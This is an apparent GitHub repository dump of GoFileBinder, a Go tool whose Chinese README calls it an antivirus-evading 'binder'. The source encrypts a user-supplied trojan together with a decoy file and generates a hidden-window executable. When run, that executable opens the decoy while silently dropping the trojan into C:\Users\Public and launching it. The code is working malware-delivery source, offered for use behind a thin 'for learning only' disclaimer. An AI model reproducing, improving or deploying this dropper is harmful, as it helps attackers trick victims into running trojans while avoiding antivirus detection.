├── GoFileBinder.go └── README.md /GoFileBinder.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bytes" 5 | "crypto/aes" 6 | "crypto/cipher" 7 | "encoding/base64" 8 | "fmt" 9 | "io/ioutil" 10 | "log" 11 | "math/rand" 12 | "os" 13 | "os/exec" 14 | "path/filepath" 15 | "strings" 16 | "time" 17 | ) 18 | 19 | var ( 20 | logo = ` 21 | \__ | | | |__ _____|__|_ _ __ ____ |__| 22 | / | | | | \ / ___/ \ \/ \/ // __ \| | 23 | \____ | | Y \\___ \| |\ /\ ___/| | 24 | / ______|___|___| /____ >__| \/\_/ \___ >__| 25 | \/ \/ \/ \/ 26 | ` 27 | tvb = "这是我的频道欢迎投稿学习:https://space.bilibili.com/353948151 " 28 | 29 | keytishi = ` 30 | 首先编译好命令参数如: GoFileBinder.exe 木马.exe xxx.txt 31 | ` 32 | ) 33 | 34 | func RandStr(length int) string { 35 | str := "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 36 | bytes := []byte(str) 37 | result := []byte{} 38 | rand.Seed(time.Now().UnixNano() + int64(rand.Intn(100))) 39 | for i := 0; i < length; i++ { 40 | result = append(result, bytes[rand.Intn(len(bytes))]) 41 | } 42 | return string(result) 43 | } 44 | func main() { 45 | 46 | fmt.Println(logo) 47 | fmt.Println(tvb) 48 | if len(os.Args) != 3 { 49 | fmt.Println(keytishi) 50 | return 51 | } 52 | mumafile := os.Args[1] 53 | docfile := os.Args[2] 54 | key := RandStr(16) 55 | 56 | info, _ := ioutil.ReadFile(mumafile) 57 | var mumafileStr string = string(info[:]) 58 | AesmumafileStr := AesEncrypt(mumafileStr, key) 59 | 60 | infodoc, _ := ioutil.ReadFile(docfile) 61 | var docfileStr string = string(infodoc[:]) 62 | AesdocfileStr := AesEncrypt(docfileStr, key) 63 | SourceCode := fmt.Sprintf(` 64 | package main 65 | import ( 66 | "crypto/aes" 67 | "crypto/cipher" 68 | "encoding/base64" 69 | "os" 70 | "os/exec" 71 | "strings" 72 | "syscall" 73 | ) 74 | 75 | var ( 76 | key = "%s" 77 | mumafilename = "%s" 78 | docfilename = "%s" 79 | docfilenames = "%s" 80 | docfile = "%s" 81 | 82 | numafile = "%s" 83 | dstFile = "\\Users\\Public\\Yihsiwei.DAT" 84 | selfile, _ = os.Executable() 85 | ddocfile = AesDecrypt(docfile, key) 86 | 87 | dmumafile = AesDecrypt(numafile, key) 88 | ) 89 | 90 | func main() { 91 | panfu := selfile[0:2] 92 | if !strings.Contains(selfile, "C:") { 93 | 94 | dstFile = panfu + "\\Yihsiwei.DAT" 95 | } else { 96 | dstFile = panfu + dstFile 97 | } 98 | 99 | os.Rename(selfile, dstFile) 100 | 101 | 102 | f2, _ := os.Create(docfilename) 103 | _, _ = f2.Write([]byte(ddocfile)) 104 | f2.Close() 105 | strccc, _ := os.Getwd() 106 | cmd := exec.Command("cmd", " /c ",strccc+docfilenames) 107 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 108 | //cmd2.Stdout = os.Stdout 109 | _ = cmd.Start() 110 | var dstFilecc = "C:\\Users\\Public\\" + mumafilename 111 | f, _ := os.Create(dstFilecc) 112 | _, _ = f.Write([]byte(dmumafile)) 113 | f.Close() 114 | 115 | 116 | _, err := os.Stat(dstFilecc) 117 | 118 | if err == nil { 119 | 120 | cmda := exec.Command(dstFilecc) 121 | _ = cmda.Start() 122 | 123 | } 124 | 125 | 126 | } 127 | 128 | func PKCS7UnPadding(origData []byte) []byte { 129 | length := len(origData) 130 | unpadding := int(origData[length-1]) 131 | return origData[:(length - unpadding)] 132 | } 133 | func AesDecrypt(cryted string, key string) string { 134 | crytedByte, _ := base64.StdEncoding.DecodeString(cryted) 135 | k := []byte(key) 136 | block, _ := aes.NewCipher(k) 137 | blockSize := block.BlockSize() 138 | blockMode := cipher.NewCBCDecrypter(block, k[:blockSize]) 139 | orig := make([]byte, len(crytedByte)) 140 | blockMode.CryptBlocks(orig, crytedByte) 141 | orig = PKCS7UnPadding(orig) 142 | return string(orig) 143 | } 144 | `, key, mumafile, docfile, "\\\\"+docfile, AesdocfileStr, AesmumafileStr) 145 | 146 | f, _ := os.Create("Yihsiwei.go") 147 | 148 | _, _ = f.Write([]byte(SourceCode)) 149 | f.Close() 150 | 151 | exitfile("Yihsiwei.go") 152 | time.Sleep(time.Duration(1) * time.Second) 153 | 154 | batfile, _ := os.Create("Yihsiwei.bat") 155 | 156 | _, _ = batfile.Write([]byte("go build -ldflags \"-H=windowsgui\" Yihsiwei.go")) 157 | batfile.Close() 158 | exitfile("Yihsiwei.bat") 159 | time.Sleep(time.Duration(1) * time.Second) 160 | cmd := exec.Command("Yihsiwei.bat") 161 | _ = cmd.Start() 162 | 163 | exitfile("Yihsiwei.exe") 164 | os.RemoveAll("Yihsiwei.go") 165 | os.RemoveAll("Yihsiwei.bat") 166 | 167 | } 168 | func exitfile(filename string) { 169 | for { 170 | time.Sleep(time.Duration(1) * time.Second) 171 | _, err := os.Stat(GetCurrentDirectory() + "/" + filename) 172 | if err == nil { 173 | break 174 | } 175 | } 176 | } 177 | func GetCurrentDirectory() string { 178 | dir, err := filepath.Abs(filepath.Dir(os.Args[0])) 179 | if err != nil { 180 | log.Fatal(err) 181 | } 182 | 183 | return strings.Replace(dir, "\\", "/", -1) 184 | } 185 | func PKCS7Padding(ciphertext []byte, blocksize int) []byte { 186 | padding := blocksize - len(ciphertext)%blocksize 187 | padtext := bytes.Repeat([]byte{byte(padding)}, padding) 188 | return append(ciphertext, padtext...) 189 | } 190 | 191 | func AesEncrypt(orig string, key string) string { 192 | origData := []byte(orig) 193 | k := []byte(key) 194 | block, _ := aes.NewCipher(k) 195 | blockSize := block.BlockSize() 196 | origData = PKCS7Padding(origData, blockSize) 197 | blockMode := cipher.NewCBCEncrypter(block, k[:blockSize]) 198 | cryted := make([]byte, len(origData)) 199 | blockMode.CryptBlocks(cryted, origData) 200 | return base64.StdEncoding.EncodeToString(cryted) 201 | } 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # GoFileBinder 2 | 3 | golang免杀捆绑器 捆绑器免杀效果会持续更新下去-------release处查看新版本,为了更好的免杀之后将不公布源码 4 | 使用以下命令进行捆绑器编译 5 | `go build GoFileBinder.go` 6 | 7 | 使用以下命令生成捆绑文件(注:GoFileBinder.exe单独放入一个文件夹中) 8 | `GoFileBinder.exe 木马.exe xxx.txt` 9 | 10 | 可以在我的频道中看到详细使用哦 11 | `https://space.bilibili.com/353948151` 12 | 视频中提到的key现在已经不用手动了 13 | 14 | 非常感谢嘟嘟提出项目bug问题以及优化方案 15 | 16 | 此项目为开源项目,仅提供与学习。请勿用于违法行为,造成的违法行为与本人无关。 17 | 18 | --------------------------------------------------------------------------------